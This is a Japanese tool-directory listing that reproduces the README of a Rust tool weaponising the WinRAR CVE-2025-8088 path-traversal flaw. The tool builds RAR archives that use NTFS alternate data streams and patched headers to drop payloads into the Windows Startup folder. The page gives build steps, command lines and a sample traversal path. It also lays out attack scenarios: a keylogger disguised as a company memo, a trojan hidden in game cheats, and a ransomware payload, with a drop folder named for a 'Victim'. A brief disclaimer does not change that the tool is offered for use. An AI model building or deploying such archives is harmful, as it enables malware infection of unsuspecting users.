Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/kitsuneshade/winrar-exploit-tool---rust-edition
永続化メカニズムエクスプロイトウェブアプリケーション悪用ポストエクスプロイトペネトレーションテスト学習と教育レッドチーミングペイロード開発バイナリエクスプロイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
GitHubkitsuneshade/winrar-exploit-tool---rust-edition

WinRAR-Exploit-Tool---Rust-Edition

WinRAR CVE-2025-8088 エクスプロイトツールの高性能かつメモリ安全な実装です。信頼性とパフォーマンスを向上させるため、Rustで書き直されています。

リポジトリを見る
8361年前未レビュー
共有

WinRAR エクスプロイトツール - Rust 版

高度な WinRAR パストラバーサルエクスプロイトツール - Rust で作成

CVE-2025-8088 を利用する WinRAR エクスプロイトツールの高性能かつメモリ安全な実装で、信頼性とパフォーマンスを向上させるために Rust で書き直されました。

機能

  • ADS 悪用 - ペイロード隠蔽のための NTFS 代替データストリーム
  • RAR5 ヘッダー操作 - パス注入のための直接ヘッダーパッチ
  • モダンな GUI - CSS スタイリングを備えた美しい GTK ベースのインターフェース
  • スタートアップ標的化 - Windows スタートアップへのペイロード自動配置
  • カスタムデコイ対応 - 独自のデコイファイルまたはデフォルトを使用可能
  • ユニバーサルファイル対応 - ペイロードとデコイの両方で任意のファイルタイプをサポート
  • 堅牢なエラーハンドリング - 包括的なエラーチェックと診断
  • システム診断 - 自動システム互換性チェック
  • メモリ効率 - スマートなリソース管理による低メモリ使用

必要条件

  • Rust 1.70+ - モダンな Rust ツールチェーン
  • GTK 開発ライブラリ - GUI サポート用
  • WinRAR CLI - RAR アーカイブ作成用
  • Windows 10/11 - NTFS サポートが必要

クイックスタート

1. Rust のインストール

root@kitploit:~
# Install Rust using rustup


# Verify installation
rustc --version
cargo --version

2. GTK 開発ライブラリのインストール

Windows(MSVC)

root@kitploit:~
# Using vcpkg
vcpkg install gtk:x64-windows

または MSYS2 を使用

root@kitploit:~
pacman -S mingw-w64-x86_64-gtk4

3. クローンとビルド

root@kitploit:~
# Navigate to the rust project
cd winrar_exploit_rust

# Build in debug mode
cargo build

# Build optimized release
cargo build --release

# Run the application
cargo run --release

使用方法

  1. ペイロードを選択 - 任意のファイルをペイロードとして選択(.exe、.bat、.jpg、.pdf など)
  2. デコイを選択 - 任意のファイルをデコイとして選択(空の場合はデフォルトが作成されます)
  3. アーカイブ名を指定 - 出力する RAR ファイル名を入力
  4. ビルド - エクスプロイトアーカイブを生成

使用例

基本的な使用方法

ペイロードとデコイファイルを使用して簡単なエクスプロイトを作成:

root@kitploit:~
# Create exploit with executable payload
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "exploit.rar"

# Create exploit with script payload
.\winrar_exploit_rust.exe create --payload "C:\malicious.ps1" --decoy "C:\document.pdf" --output "malicious.rar"

高度な使用方法

複数のデコイファイル

root@kitploit:~
# Use multiple decoy files separated by commas
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\photo.jpg,C:\document.pdf,C:\video.mp4" --output "multi_decoy.rar"

カスタムドロップディレクトリ

root@kitploit:~
# Specify custom directory where payload will be placed
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "custom_drop.rar" --drop_dir "C:\Users\Victim\Desktop"

さまざまなペイロードタイプ

root@kitploit:~
# Image payload (steganography)
.\winrar_exploit_rust.exe create --payload "C:\malicious.jpg" --decoy "C:\innocent.txt" --output "image_exploit.rar"

# PDF payload
.\winrar_exploit_rust.exe create --payload "C:\trojan.pdf" --decoy "C:\readme.txt" --output "pdf_exploit.rar"

# Batch script payload
.\winrar_exploit_rust.exe create --payload "C:\ransomware.bat" --decoy "C:\instructions.txt" --output "batch_exploit.rar"

システム診断

root@kitploit:~
# Run system diagnostics to check compatibility
.\winrar_exploit_rust.exe diagnose

# Show available tools and features
.\winrar_exploit_rust.exe tools

実際のシナリオ

シナリオ 1: 企業環境

root@kitploit:~
# Create a malicious document that looks like a company memo
.\winrar_exploit_rust.exe create --payload "C:\keylogger.exe" --decoy "C:\company_memo.pdf" --output "important_memo.rar"

シナリオ 2: ゲームコミュニティ

root@kitploit:~
# Hide malware in a game cheat file
.\winrar_exploit_rust.exe create --payload "C:\trojan.exe" --decoy "C:\game_cheat.txt,C:\screenshot.jpg" --output "cheats.rar"

このツールは、以下の手順でパストラバーサルを使用した RAR アーカイブを作成します:

  1. ADS 作成 - NTFS 代替データストリームにペイロードを隠す
  2. RAR 構築 - WinRAR CLI を使用して ADS 付きのベース RAR を作成
  3. ヘッダーパッチ - RAR5 ヘッダーにトラバーサルパスを注入
  4. CRC 再計算 - アーカイブの整合性を保証
  5. 出力 - 抽出可能な悪意のある RAR を生成

パス例: ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe

対応ファイルタイプ

ペイロードファイル:

  • ✅ 実行ファイル(.exe、.bat、.cmd)
  • ✅ スクリプト(.py、.js、.vbs、.ps1)
  • ✅ ドキュメント(.pdf、.docx、.xlsx)
  • ✅ 画像(.jpg、.png、.gif)
  • ✅ 動画(.mp4、.avi)
  • ✅ 音声(.mp3、.wav)
  • ✅ 任意のファイルタイプ

デコイファイル:

  • ✅ テキストファイル(.txt、.doc、.pdf)
  • ✅ 画像(.jpg、.png、.gif、.bmp)
  • ✅ 動画(.mp4、.avi)
  • ✅ 音声(.mp3、.wav)
  • ✅ ドキュメント(.docx、.xlsx)
  • ✅ 任意のファイルタイプ

アーキテクチャ

root@kitploit:~
winrar_exploit_rust/
├── src/
│   ├── main.rs          # Application entry point
│   ├── gui.rs           # GTK-based user interface
│   ├── exploit.rs       # Core exploit logic
│   ├── ads.rs           # NTFS ADS manipulation
│   ├── rar.rs           # RAR5 header manipulation
│   ├── diagnostics.rs   # System diagnostics
│   └── error.rs         # Error handling
├── Cargo.toml           # Dependencies and build config
└── README.md           # This file

トラブルシューティング

このツールには、以下をチェックする自動診断機能が含まれています:

  • ✅ WinRAR CLI のインストール
  • ✅ NTFS ADS サポート
  • ✅ スタートアップディレクトリの権限
  • ✅ GTK ライブラリの利用可能性
  • ✅ ファイルシステムの互換性

よくある問題:

  1. 「GTK が見つかりません」

    root@kitploit:~
    # Install GTK development libraries
    # Windows (vcpkg)
    vcpkg install gtk:x64-windows
    
    # Or using MSYS2
    pacman -S mingw-w64-x86_64-gtk4
    
  2. 「WinRAR CLI が見つかりません」

    • https://www.winrar.com から WinRAR をインストール
    • rar.exe が Program Files にあることを確認
  3. 「スタートアップディレクトリに書き込めません」

    • ツールを管理者として実行
    • フォルダの権限を確認
  4. 「NTFS ADS がサポートされていません」

    • NTFS ファイルシステムを使用していることを確認
    • ADS は FAT32/exFAT ではサポートされていません
  5. コンパイルエラー

    root@kitploit:~
    # Update Rust toolchain
    rustup update
    
    # Clean and rebuild
    cargo clean
    cargo build --release
    

コードフォーマット

root@kitploit:~
# Format code
cargo fmt

# Lint code
cargo clippy

依存関係

主な依存関係は以下のとおりです:

  • gtk - モダンな GUI フレームワーク
  • tokio - 非同期ランタイム
  • windows - Windows API バインディング
  • crc32fast - 高速 CRC32 計算
  • byteorder - バイトオーダー操作
  • anyhow - エラーハンドリング

セキュリティに関する考慮事項

  • 教育目的: このツールは、許可されたテストおよび教育目的でのみ使用してください
  • 管理された環境: 適切な同意を得た管理された環境でのみ使用してください
  • 法令遵守: 適用される法律および規制への準拠を確保してください
  • 責任ある開示: 責任ある開示の慣行に従ってください

ライセンス

このプロジェクトは MIT ライセンスの下でライセンスされています。詳細は LICENSE ファイルを参照してください。

作者

Telegram で @kanonufo によって作成


CVE-2025-8088 エクスプロイト用の高性能レッドチームツール - Rust 版

ツールをダウンロード